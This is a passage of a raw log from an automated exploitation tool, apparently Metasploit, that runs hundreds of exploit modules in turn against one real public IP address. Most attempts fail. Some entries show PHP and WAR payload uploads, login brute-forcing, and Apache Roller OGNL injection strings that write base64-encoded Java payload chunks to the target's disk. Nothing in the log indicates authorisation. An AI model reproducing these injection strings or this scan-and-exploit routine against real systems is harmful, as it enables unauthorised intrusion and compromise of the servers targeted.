  788. [*] [2016.08.17-21:12:41] [0193] Started bind handler
  789. [*] [2016.08.17-21:12:41] [0193] Authenticating as user (admin)
  790. [-] [2016.08.17-21:12:41] [0193] Exploit aborted due to failure: no-access: 166.62.27.177:80 - Authentication failed
  791. [+] [2016.08.17-21:12:42] Workspace:Seocam Progress:198/337 (58%) [194/332] 166.62.27.177:80 - Wordpress Reflex Gallery Upload Vulnerability
  792. [*] [2016.08.17-21:12:42] Using a random high port (63355) for 166.62.27.177
  793. [*] [2016.08.17-21:12:42] [0194] Started bind handler
  794. [-] [2016.08.17-21:12:43] [0194] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Unable to deploy payload, server returned 404
  795. [+] [2016.08.17-21:12:43] Workspace:Seocam Progress:199/337 (59%) [195/332] 166.62.27.177:80 - PHP-Charts v1.0 PHP Code Execution Vulnerability
  796. [-] [2016.08.17-21:12:43] No bind payloads available for exploit/unix/webapp/php_charts_exec)
  797. [-] [2016.08.17-21:12:43] [0195] Exploit failed: A payload has not been selected.
  798. [+] [2016.08.17-21:12:44] Workspace:Seocam Progress:200/337 (59%) [196/332] 166.62.27.177:80 - Mutiny 5 Arbitrary File Upload
  799. [*] [2016.08.17-21:12:44] Using a random high port (11867) for 166.62.27.177
  800. [-] [2016.08.17-21:12:44] [0196] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.4.23" does not match "(?-mix:Apache-Coyote)", use 'set FingerprintCheck false' to disable this check.
  801. [+] [2016.08.17-21:12:44] Workspace:Seocam Progress:201/337 (59%) [197/332] 166.62.27.177:80 - Ruby on Rails XML Processor YAML Deserialization Code Execution
  802. [-] [2016.08.17-21:12:44] No bind payloads available for exploit/multi/http/rails_xml_yaml_code_exec)
  803. [-] [2016.08.17-21:12:45] [0197] Exploit failed: A payload has not been selected.
  804. [+] [2016.08.17-21:12:45] Workspace:Seocam Progress:202/337 (59%) [198/332] 166.62.27.177:80 - ZoneMinder Video Server packageControl Command Execution
  805. [-] [2016.08.17-21:12:45] No bind payloads available for exploit/unix/webapp/zoneminder_packagecontrol_exec)
  806. [-] [2016.08.17-21:12:45] [0198] Exploit failed: A payload has not been selected.
  807. [+] [2016.08.17-21:12:46] Workspace:Seocam Progress:203/337 (60%) [199/332] 166.62.27.177:80 - Ruby on Rails JSON Processor YAML Deserialization Code Execution
  808. [-] [2016.08.17-21:12:46] No bind payloads available for exploit/multi/http/rails_json_yaml_code_exec)
  809. [-] [2016.08.17-21:12:46] [0199] Exploit failed: A payload has not been selected.
  810. [+] [2016.08.17-21:12:46] Workspace:Seocam Progress:204/337 (60%) [200/332] 166.62.27.177:80 - SonicWALL GMS 6 Arbitrary File Upload
  811. [*] [2016.08.17-21:12:46] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  812. [*] [2016.08.17-21:12:46] Using a random high port (39108) for 166.62.27.177
  813. [-] [2016.08.17-21:12:46] [0200] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.4.23" does not match "(?-mix:Apache-Coyote)", use 'set FingerprintCheck false' to disable this check.
  814. [+] [2016.08.17-21:12:47] Workspace:Seocam Progress:205/337 (60%) [201/332] 166.62.27.177:80 - DataLife Engine preview.php PHP Code Injection
  815. [*] [2016.08.17-21:12:47] Using a random high port (23766) for 166.62.27.177
  816. [*] [2016.08.17-21:12:47] [0201] Started bind handler
  817. [*] [2016.08.17-21:12:47] [0201] Exploiting the preg_replace() to execute PHP code
  818. [+] [2016.08.17-21:12:51] Workspace:Seocam Progress:206/337 (61%) [202/332] 166.62.27.177:80 - D-Link Devices Unauthenticated Remote Command Execution
  819. [-] [2016.08.17-21:12:51] No bind payloads available for exploit/linux/http/dlink_command_php_exec_noauth)
  820. [*] [2016.08.17-21:12:51] [0202] 166.62.27.177:80 - Telnet port used: 62147
  821. [*] [2016.08.17-21:12:51] [0202] 166.62.27.177:80 - Sending exploit request...
  822. [*] [2016.08.17-21:12:52] [0202] 166.62.27.177:80 - Trying to establish a telnet connection...
  823. [-] [2016.08.17-21:12:57] [0202] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (166.62.27.177:62147).
  824. [+] [2016.08.17-21:12:57] Workspace:Seocam Progress:207/337 (61%) [203/332] 166.62.27.177:80 - Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability
  825. [*] [2016.08.17-21:12:57] Using a random high port (8636) for 166.62.27.177
  826. [*] [2016.08.17-21:12:57] [0203] Started bind handler
  827. [*] [2016.08.17-21:12:57] [0203] Authenticating as user 'admin'
  828. [-] [2016.08.17-21:12:59] [0203] Exploit aborted due to failure: no-access: 166.62.27.177:80 - Authentication failed
  829. [+] [2016.08.17-21:13:00] Workspace:Seocam Progress:208/337 (61%) [204/332] 166.62.27.177:80 - Linksys WRT160nv2 apply.cgi Remote Command Injection
  830. [-] [2016.08.17-21:13:00] No bind payloads available for exploit/linux/http/linksys_wrt160nv2_apply_exec)
  831. [+] [2016.08.17-21:13:00] Workspace:Seocam Progress:209/337 (62%) [205/332] 166.62.27.177:80 - OpenEMR PHP File Upload Vulnerability
  832. [*] [2016.08.17-21:13:06] Using a random high port (24072) for 166.62.27.177
  833. [*] [2016.08.17-21:13:06] [0205] Started bind handler
  834. [*] [2016.08.17-21:13:06] [0205] Sending PHP payload (PFsMTdtbuT.php)
  835. [-] [2016.08.17-21:13:07] [0190] Exploit aborted due to failure: unknown: There was an unexpected response to the xslt transformation request
  836. [+] [2016.08.17-21:13:07] Workspace:Seocam Progress:210/337 (62%) [206/332] 166.62.27.177:80 - PolarBear CMS PHP File Upload Vulnerability
  837. [*] [2016.08.17-21:13:07] Using a random high port (9061) for 166.62.27.177
  838. [*] [2016.08.17-21:13:07] [0206] Started bind handler
  839. [*] [2016.08.17-21:13:07] [0206] Uploading payload qObii.php
  840. [-] [2016.08.17-21:13:08] [0206] Exploit aborted due to failure: unexpected-reply: 166.62.27.177:80 - Upload failed
  841. [+] [2016.08.17-21:13:08] Workspace:Seocam Progress:211/337 (62%) [207/332] 166.62.27.177:80 - Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability
  842. [*] [2016.08.17-21:13:08] Using a random high port (13528) for 166.62.27.177
  843. [*] [2016.08.17-21:13:08] [0207] Started bind handler
  844. [*] [2016.08.17-21:13:08] [0207] Uploading PHP payload (1189 bytes)
  845. [-] [2016.08.17-21:13:09] [0207] Exploit aborted due to failure: unexpected-reply: 166.62.27.177:80 - Uploading PHP payload failed
  846. [+] [2016.08.17-21:13:10] Workspace:Seocam Progress:212/337 (62%) [208/332] 166.62.27.177:80 - GroundWork monarch_scan.cgi OS Command Injection
  847. [-] [2016.08.17-21:13:10] No bind payloads available for exploit/linux/http/groundwork_monarch_cmd_exec)
  848. [-] [2016.08.17-21:13:10] [0208] Exploit failed: A payload has not been selected.
  849. [+] [2016.08.17-21:13:10] Workspace:Seocam Progress:213/337 (63%) [209/332] 166.62.27.177:80 - vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection
  850. [*] [2016.08.17-21:13:10] Using a random high port (17324) for 166.62.27.177
  851. [*] [2016.08.17-21:13:10] [0209] Started bind handler
  852. [*] [2016.08.17-21:13:10] [0209] Checking for a valid node id...
  853. [*] [2016.08.17-21:13:10] [0209] Brute forcing to find a valid node id...
  854. [-] [2016.08.17-21:13:28] [0205] Exploit aborted due to failure: not-vulnerable: 166.62.27.177:80 - File wasn't uploaded, aborting!
  855. [+] [2016.08.17-21:13:29] Workspace:Seocam Progress:214/337 (63%) [210/332] 166.62.27.177:80 - MiniWeb (Build 300) Arbitrary File Upload
  856. [*] [2016.08.17-21:13:29] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  857. [*] [2016.08.17-21:13:29] Using a random high port (59137) for 166.62.27.177
  858. [-] [2016.08.17-21:13:29] [0210] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.4.23" does not match "(?-mix:MiniWeb)", use 'set FingerprintCheck false' to disable this check.
  859. [+] [2016.08.17-21:13:29] Workspace:Seocam Progress:215/337 (63%) [211/332] 166.62.27.177:80 - WordPress W3 Total Cache PHP Code Execution
  860. [*] [2016.08.17-21:13:29] Using a random high port (45654) for 166.62.27.177
  861. [*] [2016.08.17-21:13:30] [0211] Started bind handler
  862. [-] [2016.08.17-21:13:30] [0211] Exploit aborted due to failure: no-target: / does not seeem to be Wordpress site
  863. [+] [2016.08.17-21:13:31] Workspace:Seocam Progress:216/337 (64%) [212/332] 166.62.27.177:80 - D-Link Devices Unauthenticated Remote Command Execution
  864. [-] [2016.08.17-21:13:31] No bind payloads available for exploit/linux/http/dlink_dir300_exec_telnet)
  865. [*] [2016.08.17-21:13:31] [0212] 166.62.27.177:80 - Trying to login with admin / admin
  866. [-] [2016.08.17-21:13:52] [0212] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Could not connect to the webservice - no response
  867. [+] [2016.08.17-21:13:52] Workspace:Seocam Progress:217/337 (64%) [213/332] 166.62.27.177:80 - phpMyAdmin Authenticated Remote Code Execution via preg_replace()
  868. [*] [2016.08.17-21:13:53] Using a random high port (36856) for 166.62.27.177
  869. [*] [2016.08.17-21:13:53] [0213] Started bind handler
  870. [*] [2016.08.17-21:13:53] [0213] Grabbing CSRF token...
  871. [-] [2016.08.17-21:13:54] [0213] Exploit aborted due to failure: not-found: Couldn't find token. Is URI set correctly?
  872. [+] [2016.08.17-21:13:54] Workspace:Seocam Progress:218/337 (64%) [214/332] 166.62.27.177:80 - GetSimpleCMS PHP File Upload Vulnerability
  873. [*] [2016.08.17-21:13:54] Using a random high port (60438) for 166.62.27.177
  874. [+] [2016.08.17-21:13:54] Workspace:Seocam Progress:219/337 (64%) [215/332] 166.62.27.177:80 - Openfiler v2.x NetworkCard Command Execution
  875. [-] [2016.08.17-21:13:54] No bind payloads available for exploit/linux/http/openfiler_networkcard_exec)
  876. [-] [2016.08.17-21:13:54] [0215] Exploit failed: A payload has not been selected.
  877. [+] [2016.08.17-21:13:55] Workspace:Seocam Progress:220/337 (65%) [216/332] 166.62.27.177:80 - ZPanel 10.0.0.2 htpasswd Module Username Command Execution
  878. [-] [2016.08.17-21:13:55] No bind payloads available for exploit/unix/webapp/zpanel_username_exec)
  879. [+] [2016.08.17-21:13:55] Workspace:Seocam Progress:221/337 (65%) [217/332] 166.62.27.177:80 - VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload
  880. [*] [2016.08.17-21:13:55] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  881. [*] [2016.08.17-21:13:56] Using a random high port (31409) for 166.62.27.177
  882. [-] [2016.08.17-21:13:56] [0217] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.4.23" does not match "(?-mix:Apache.*Win32)", use 'set FingerprintCheck false' to disable this check.
  883. [+] [2016.08.17-21:13:56] Workspace:Seocam Progress:222/337 (65%) [218/332] 166.62.27.177:80 - LibrettoCMS File Manager Arbitary File Upload Vulnerability
  884. [*] [2016.08.17-21:13:56] Using a random high port (62342) for 166.62.27.177
  885. [*] [2016.08.17-21:13:56] [0218] Started bind handler
  886. [*] [2016.08.17-21:13:56] [0218] Uploading malicious file...
  887. [-] [2016.08.17-21:13:57] [0218] Exploit aborted due to failure: unexpected-reply: 166.62.27.177:80 - Unknown reply: 404
  888. [+] [2016.08.17-21:13:57] Workspace:Seocam Progress:223/337 (66%) [219/332] 166.62.27.177:80 - Havalite CMS Arbitary File Upload Vulnerability
  889. [*] [2016.08.17-21:13:57] Using a random high port (11441) for 166.62.27.177
  890. [*] [2016.08.17-21:13:57] [0219] Started bind handler
  891. [*] [2016.08.17-21:13:57] [0219] Uploading malicious file...
  892. [-] [2016.08.17-21:13:58] [0219] Exploit aborted due to failure: not-found: 166.62.27.177:80 - No upload.php found
  893. [+] [2016.08.17-21:13:59] Workspace:Seocam Progress:224/337 (66%) [220/332] 166.62.27.177:80 - Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
  894. [*] [2016.08.17-21:13:59] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  895. [*] [2016.08.17-21:13:59] Using a random high port (32027) for 166.62.27.177
  896. [-] [2016.08.17-21:13:59] Fatal: Could not select a callback port when bind connections are specified
  897. [*] [2016.08.17-21:13:59] [0220] Started bind handler
  898. [*] [2016.08.17-21:13:59] [0220] 166.62.27.177:80 - Target autodetection...
  899. [-] [2016.08.17-21:14:20] [0220] Exploit aborted due to failure: no-target: 166.62.27.177:80 - In order to autodetect, a valid action, returning 200, must be provided as TARGETURI, returning 200
  900. [+] [2016.08.17-21:14:21] Workspace:Seocam Progress:225/337 (66%) [221/332] 166.62.27.177:80 - vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload
  901. [*] [2016.08.17-21:14:21] Using a random high port (3372) for 166.62.27.177
  902. [*] [2016.08.17-21:14:21] [0221] Started bind handler
  903. [*] [2016.08.17-21:14:47] [0221] Uploading payload...
  904. [-] [2016.08.17-21:14:47] [0221] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Upload failed
  905. [+] [2016.08.17-21:14:47] Workspace:Seocam Progress:226/337 (67%) [222/332] 166.62.27.177:80 - Oracle Endeca Server Remote Command Execution
  906. [*] [2016.08.17-21:14:48] Using a random high port (51149) for 166.62.27.177
  907. [*] [2016.08.17-21:14:48] [0222] Started bind handler
  908. [*] [2016.08.17-21:14:48] [0222] Powershell command length: 2297
  909. [*] [2016.08.17-21:14:48] [0222] Exploiting through Powershell...
  910. [*] [2016.08.17-21:14:48] [0222] 404
  911. <!DOCTYPE html>
  912. <html>
  913. <head>
  914. <title>File Not Found</title>
  915. <meta http-equiv="content-type" content="text/html; charset=utf-8" >
  916. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  917. <style type="text/css">
  918. body {
  919. background-color: #eee;
  920. }
  921. body, h1, p {
  922. font-family: "Helvetica Neue", "Segoe UI", Segoe, Helvetica, Arial, "Lucida Grande", sans-serif;
  923. font-weight: normal;
  924. margin: 0;
  925. padding: 0;
  926. text-align: center;
  927. }
  928. .container {
  929. margin-left: auto;
  930. margin-right: auto;
  931. margin-top: 177px;
  932. max-width: 1170px;
  933. padding-right: 15px;
  934. padding-left: 15px;
  935. }
  936. .row:before, .row:after {
  937. display: table;
  938. content: " ";
  939. }
  940. .col-md-6 {
  941. width: 50%;
  942. }
  943. .col-md-push-3 {
  944. margin-left: 25%;
  945. }
  946. h1 {
  947. font-size: 48px;
  948. font-weight: 300;
  949. margin: 0 0 20px 0;
  950. }
  951. .lead {
  952. font-size: 21px;
  953. font-weight: 200;
  954. margin-bottom: 20px;
  955. }
  956. p {
  957. margin: 0 0 10px;
  958. }
  959. a {
  960. color: #3282e6;
  961. text-decoration: none;
  962. }
  963. </style>
  964. </head>
  965. <body>
  966. <div class="container text-center" id="error">
  967. <svg height="100" width="100">
  968. <polygon points="50,25 17,80 82,80" stroke-linejoin="round" style="fill:none;stroke:#ff8a00;stroke-width:8" />
  969. <text x="42" y="74" fill="#ff8a00" font-family="sans-serif" font-weight="900" font-size="42px">!</text>
  970. </svg>
  971. <div class="row">
  972. <div class="col-md-12">
  973. <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div>
  974. <h1>File not found (404 error)</h1>
  975. </div>
  976. </div>
  977. <div class="row">
  978. <div class="col-md-6 col-md-push-3">
  979. <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p>
  980. </div>
  981. </div>
  982. </div>
  983. </body>
  984. </html>
  985. [-] [2016.08.17-21:14:48] [0222] Exploit aborted due to failure: unexpected-reply: 166.62.27.177:80 - Unable to execute the CMD Stager
  986. [+] [2016.08.17-21:14:49] Workspace:Seocam Progress:227/337 (67%) [223/332] 166.62.27.177:80 - PineApp Mail-SeCure livelog.html Arbitrary Command Execution
  987. [-] [2016.08.17-21:14:49] No bind payloads available for exploit/linux/http/pineapp_livelog_exec)
  988. [-] [2016.08.17-21:14:49] [0223] Exploit failed: A payload has not been selected.
  989. [+] [2016.08.17-21:14:49] Workspace:Seocam Progress:228/337 (67%) [224/332] 166.62.27.177:80 - PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution
  990. [-] [2016.08.17-21:14:49] No bind payloads available for exploit/linux/http/pineapp_ldapsyncnow_exec)
  991. [-] [2016.08.17-21:14:49] [0224] Exploit failed: A payload has not been selected.
  992. [+] [2016.08.17-21:14:50] Workspace:Seocam Progress:229/337 (67%) [225/332] 166.62.27.177:80 - PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution
  993. [-] [2016.08.17-21:14:50] No bind payloads available for exploit/linux/http/pineapp_test_li_conn_exec)
  994. [-] [2016.08.17-21:14:50] [0225] Exploit failed: A payload has not been selected.
  995. [+] [2016.08.17-21:14:50] Workspace:Seocam Progress:230/337 (68%) [226/332] 166.62.27.177:80 - OpenX Backdoor PHP Code Execution
  996. [*] [2016.08.17-21:14:50] Using a random high port (11721) for 166.62.27.177
  997. [*] [2016.08.17-21:14:51] [0226] Started bind handler
  998. [+] [2016.08.17-21:14:54] Workspace:Seocam Progress:231/337 (68%) [227/332] 166.62.27.177:80 - HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload
  999. [-] [2016.08.17-21:14:54] No bind payloads available for exploit/windows/http/hp_pcm_snac_update_domain)
  1000. [-] [2016.08.17-21:14:54] [0227] Exploit failed: A payload has not been selected.
  1001. [+] [2016.08.17-21:14:55] Workspace:Seocam Progress:232/337 (68%) [228/332] 166.62.27.177:80 - HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload
  1002. [-] [2016.08.17-21:14:55] No bind payloads available for exploit/windows/http/hp_pcm_snac_update_certificates)
  1003. [-] [2016.08.17-21:14:55] [0228] Exploit failed: A payload has not been selected.
  1004. [+] [2016.08.17-21:14:55] Workspace:Seocam Progress:233/337 (69%) [229/332] 166.62.27.177:80 - Sophos Web Protection Appliance sblistpack Arbitrary Command Execution
  1005. [-] [2016.08.17-21:14:55] No bind payloads available for exploit/linux/http/sophos_wpa_sblistpack_exec)
  1006. [-] [2016.08.17-21:14:55] [0229] Exploit failed: A payload has not been selected.
  1007. [+] [2016.08.17-21:14:56] Workspace:Seocam Progress:234/337 (69%) [230/332] 166.62.27.177:80 - Squash YAML Code Execution
  1008. [-] [2016.08.17-21:14:56] No bind payloads available for exploit/unix/webapp/squash_yaml_exec)
  1009. [-] [2016.08.17-21:14:56] [0230] Exploit failed: A payload has not been selected.
  1010. [+] [2016.08.17-21:14:57] Workspace:Seocam Progress:235/337 (69%) [231/332] 166.62.27.177:80 - Cisco Prime Data Center Network Manager Arbitrary File Upload
  1011. [*] [2016.08.17-21:14:57] Using a random high port (35968) for 166.62.27.177
  1012. [*] [2016.08.17-21:14:57] [0231] Started bind handler
  1013. [*] [2016.08.17-21:14:57] [0231] Uploading WAR file KSYh9bR5PUT7TUfI.war...
  1014. [-] [2016.08.17-21:15:18] [0231] Exploit aborted due to failure: unknown: 166.62.27.177:80 - Failed to upload the WAR payload
  1015. [+] [2016.08.17-21:15:18] Workspace:Seocam Progress:236/337 (70%) [232/332] 166.62.27.177:80 - Joomla Media Manager File Upload Vulnerability
  1016. [*] [2016.08.17-21:15:18] Using a random high port (61215) for 166.62.27.177
  1017. [*] [2016.08.17-21:15:18] [0232] Started bind handler
  1018. [*] [2016.08.17-21:15:18] [0232] Checking Access to Media Component...
  1019. [-] [2016.08.17-21:15:19] [0232] Exploit aborted due to failure: unexpected-reply: 166.62.27.177:80 - Failed to Access the Media Manager Component
  1020. [+] [2016.08.17-21:15:20] Workspace:Seocam Progress:237/337 (70%) [233/332] 166.62.27.177:80 - Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability
  1021. [*] [2016.08.17-21:15:20] Increasing WfsDelay to 5 minutes for Dynamic Stagers
  1022. [*] [2016.08.17-21:15:20] Using a random high port (36018) for 166.62.27.177
  1023. [*] [2016.08.17-21:15:20] [0233] Started bind handler
  1024. [-] [2016.08.17-21:15:21] [0233] Exploit aborted due to failure: not-vulnerable: Target does not appear to be a Solarwinds Firewall Security Manager
  1025. [+] [2016.08.17-21:15:21] Workspace:Seocam Progress:238/337 (70%) [234/332] 166.62.27.177:80 - OpenEMR 4.1.1 Patch 14 SQLi Privilege Escalation Remote Code Execution
  1026. [*] [2016.08.17-21:15:21] Using a random high port (34094) for 166.62.27.177
  1027. [+] [2016.08.17-21:15:22] Workspace:Seocam Progress:239/337 (70%) [235/332] 166.62.27.177:80 - Western Digital Arkeia Remote Code Execution
  1028. [*] [2016.08.17-21:15:22] Using a random high port (37397) for 166.62.27.177
  1029. [*] [2016.08.17-21:15:22] [0235] Started bind handler
  1030. [*] [2016.08.17-21:15:22] [0235] Sending PHP payload which will be uploaded to hardcoded /tmp/ApplianceUpdate
  1031. [-] [2016.08.17-21:15:27] [0209] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (166.62.27.177:80).
  1032. [+] [2016.08.17-21:15:27] Workspace:Seocam Progress:240/337 (71%) [236/332] 166.62.27.177:80 - OpenSIS 'modname' PHP Code Execution
  1033. [-] [2016.08.17-21:15:28] No bind payloads available for exploit/unix/webapp/opensis_modname_exec)
  1034. [+] [2016.08.17-21:15:29] Workspace:Seocam Progress:241/337 (71%) [237/332] 166.62.27.177:80 - Linksys Devices pingstr Remote Command Injection
  1035. [-] [2016.08.17-21:15:29] No bind payloads available for exploit/linux/http/linksys_wrt110_cmd_exec)
  1036. [-] [2016.08.17-21:15:29] [0237] Exploit failed: A payload has not been selected.
  1037. [+] [2016.08.17-21:15:29] Workspace:Seocam Progress:242/337 (71%) [238/332] 166.62.27.177:80 - vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution
  1038. [*] [2016.08.17-21:15:29] Using a random high port (29216) for 166.62.27.177
  1039. [*] [2016.08.17-21:15:30] [0238] Started bind handler
  1040. [+] [2016.08.17-21:15:34] Workspace:Seocam Progress:243/337 (72%) [239/332] 166.62.27.177:80 - Zabbix Authenticated Remote Command Execution
  1041. [-] [2016.08.17-21:15:34] No bind payloads available for exploit/multi/http/zabbix_script_exec)
  1042. [-] [2016.08.17-21:15:34] [0239] Exploit failed: A payload has not been selected.
  1043. [+] [2016.08.17-21:15:35] Workspace:Seocam Progress:244/337 (72%) [240/332] 166.62.27.177:80 - ISPConfig Authenticated Arbitrary PHP Code Execution
  1044. [*] [2016.08.17-21:15:35] Using a random high port (15947) for 166.62.27.177
  1045. [*] [2016.08.17-21:15:35] [0240] Started bind handler
  1046. [-] [2016.08.17-21:15:36] [0240] Exploit aborted due to failure: unexpected-reply: Error getting initial page.
  1047. [+] [2016.08.17-21:15:36] Workspace:Seocam Progress:245/337 (72%) [241/332] 166.62.27.177:80 - OpenMediaVault Cron Remote Command Execution
  1048. [-] [2016.08.17-21:15:36] No bind payloads available for exploit/multi/http/openmediavault_cmd_exec)
  1049. [-] [2016.08.17-21:15:36] [0241] 166.62.27.177:80 - Exploit failed: A payload has not been selected.
  1050. [+] [2016.08.17-21:15:37] Workspace:Seocam Progress:246/337 (72%) [242/332] 166.62.27.177:80 - Apache Roller OGNL Injection
  1051. [*] [2016.08.17-21:15:37] Using a random high port (27235) for 166.62.27.177
  1052. [*] [2016.08.17-21:15:37] [0242] Started bind handler
  1053. [*] [2016.08.17-21:15:37] [0242] Checking injection...
  1054. [-] [2016.08.17-21:15:37] [0235] Exploit aborted due to failure: none: 166.62.27.177:80 - File wasn't uploaded, aborting!
  1055. [!] [2016.08.17-21:15:38] [0242] Target not found as vulnerable, trying anyway...
  1056. [*] [2016.08.17-21:15:38] [0242] Attempting to execute: #f=new java.io.FileOutputStream('s80RuD.jar'+#a,false),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('UEsDBBQAAAAAAOapEUlYV/waFAAAABQAAAAOAAAAbWV0YXNwbG9pdC5kYXRTcGF3bj0yCkxQT1JUPTI3MjM1ClBLAwQUAAAAAADmqRFJAAAAAAAAAAAAAAAACwAAAG1ldGFzcGxvaXQvUEsDBBQAAAAIAOapEUlwey3fThEAAEEhAAAYAAAAbWV0YXNwbG9pdC9QYXlsb2FkLmNsYXNzlRgJeBTl9b3Z2Z3ZyeRgwgLDoYiKS05FjLh4NIQg0VywwRhRcdidkJXNTtyZkKDWWkVttfcpVtRSNPawQrSbaNR6tHjUs61ardaztNbWWrV3lb43s0s2yWJpPvjP97/7mn3so7vvA4BjhBoFHoG9EvxOAYHn30vwlgJ+2KvAqfAHBZbC27z9owx/4vkdGf7MN+8y+F8UsOE9Gd7nzQcy/FWGvykwA/7Owz8k+CfP/5Lh3zz/h4cPefhIARH20RsEGZFOUOCNT0ZRRj8vAwpKKBNxDPJWkbGIwVQeimUskbFU')),#f.close(),#a='Bev'
  1057. [+] [2016.08.17-21:15:38] Workspace:Seocam Progress:247/337 (73%) [243/332] 166.62.27.177:80 - VICIdial Manager Send OS Command Injection
  1058. [-] [2016.08.17-21:15:38] No bind payloads available for exploit/unix/webapp/vicidial_manager_send_cmd_exec)
  1059. [-] [2016.08.17-21:15:38] [0243] Exploit failed: A payload has not been selected.
  1060. [*] [2016.08.17-21:15:38] [0242] Attempting to execute: #f=new java.io.FileOutputStream('s80RuD.jar'+#a,true),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('xjK+nyajJmO5jNNlDMk4Q8KZChyLs/iZTit4T8HZOEfCuTLOI7p4iIyH8tF8BQ/DBTwc7gf3T3pawSPwSKaxMHsE8SA9OUrGsISLgliBlSQ7VklYzZsaBWvxaAmPkXGxjMcyriUSHqfAaqyT8XgZl8p4QhAjuIyHE2U8ScKTmelTZPwEz/UKdOFyCRsUOJf1cy6ukLGRSayU8VQJVykQJx7pvEnC0xTYSAbC0xVIYLOELQpswlYe2mggOel4AQ/tMq6WcY2EUQk7JFwr4Rkydsp4poxdCmzGs3hYx8PZbIi9Mp7DijlXxvVkTzyP9WdIuEGByzEmYVyBK5iuqcBV7BVXYLeEGyXskTEh4fkKXIObFLgakwzfy0OK0Vk89Ml4AYuTltGW0JGwX8LNCmzDAQWuxUFW7hYeLpTxIoa/WMZP8nyJjJ/i+VI2xqclvEyBm5m2iJfTCrcG6fgKluBKGa9iTX5Gxs/yzdU8XCPh5xTYBXsZ7PO0wi/w8Rd59SW+')),#f.close(),#a='Bev'
  1061. [+] [2016.08.17-21:15:38] Workspace:Seocam Progress:248/337 (73%) [244/332] 166.62.27.177:80 - Gitlab-shell Code Execution
  1062. [*] [2016.08.17-21:15:39] Using a random high port (30881) for 166.62.27.177
  1063. [*] [2016.08.17-21:15:39] [0244] Started bind handler
  1064. [*] [2016.08.17-21:15:39] [0242] Attempting to execute: #f=new java.io.FileOutputStream('s80RuD.jar'+#a,true),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('eIeffJmHr/DwVXJs/Bqvvs7DN3j4pozXKhiBD4K4Da/jk28xo9fLuJ3nG2S8UcabZPy2hDsQpLbo+tb6lkYErfl8Y7NRmzRSG2ujTjqR2riMvLy9vmPV+mhjO0KgKbq+vulMBDzL26xoiyIET6s/o379qjbGEDgxkUo4JyP4wovOQBAbrLhJU6+RSCHMCK+bSoDBlMbBmNnnJKyUjTBtIJ1wzMbeDWY8bsZXJpKEYEk472FD0rDtZVMxeScJq5bfEF4JvyPhTuJvg2U5tpM2+hCi4f1QTam+foeemkbv+NO2fmfyaT6JA/BfttF0TkubjYNmrN8xNjDHC8MFQAupVzXi8cZBx0zZJD4x251IxZtSKxLpSVJPELIA1pzchCJlpXuNZOJCYmNB+CAeSPGEbZsxB+GoQuDrCnrFibGka2oVnoZnEKa7MP1OIlnbnrb6zLSTMMmYWq/pGHZf0ko4te3GlqRlxBFmTsa3vD+RjJtpFW/GW1QcwltV/C5+j7yp')),#f.close(),#a='Bev'
  1065. [*] [2016.08.17-21:15:40] [0242] Attempting to execute: #f=new java.io.FileOutputStream('s80RuD.jar'+#a,true),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('Jsa2VvH7eAtCae04spq44aj4A7xNxR/i7SruYh6UcQOouBteJgSX2H3GAKlVrHF6+1QchldVvAPvJLXn60DFHzEBsSaeSJM8mFFxBO/k1agKz8HzKt6Fd5NnriDJ+sx4Ppkx5vgevBfBH/VI4dFEHO+T8Mcq3o8PqPggPqTiT/CnCCWTBdiDD6v4CPPjW7umGQGI5R7H6bMjKj6KjyEcMVV/Hel+22kxUsZGM+3pB0H/mLui+sZoO60GrDTp/pA8hHTRmIqlt7iRlwMvL3g6K19d+UHCSvqZio/jExI+qeJT+DSFw2T7kmr5SIWX2ChKtYu0z3B6VHwGfy7hL1T8JT6r4nP4rISk7V/hCyq+CM+o8CQ8gVBsm05+bJVOygUS/lrFl/BlFX+Dr0wg37bhfPJrFV/F1yR8XcU38E2EQ8fvW61of6ynxXR6rPj+HESmjPX0WqQsoXJQxd/iXtLK+Jv9cCr+jr3O39zetqaDRFxCf7xd1RalyvV7Fd/CP6j4')),#f.close(),#a='Bev'
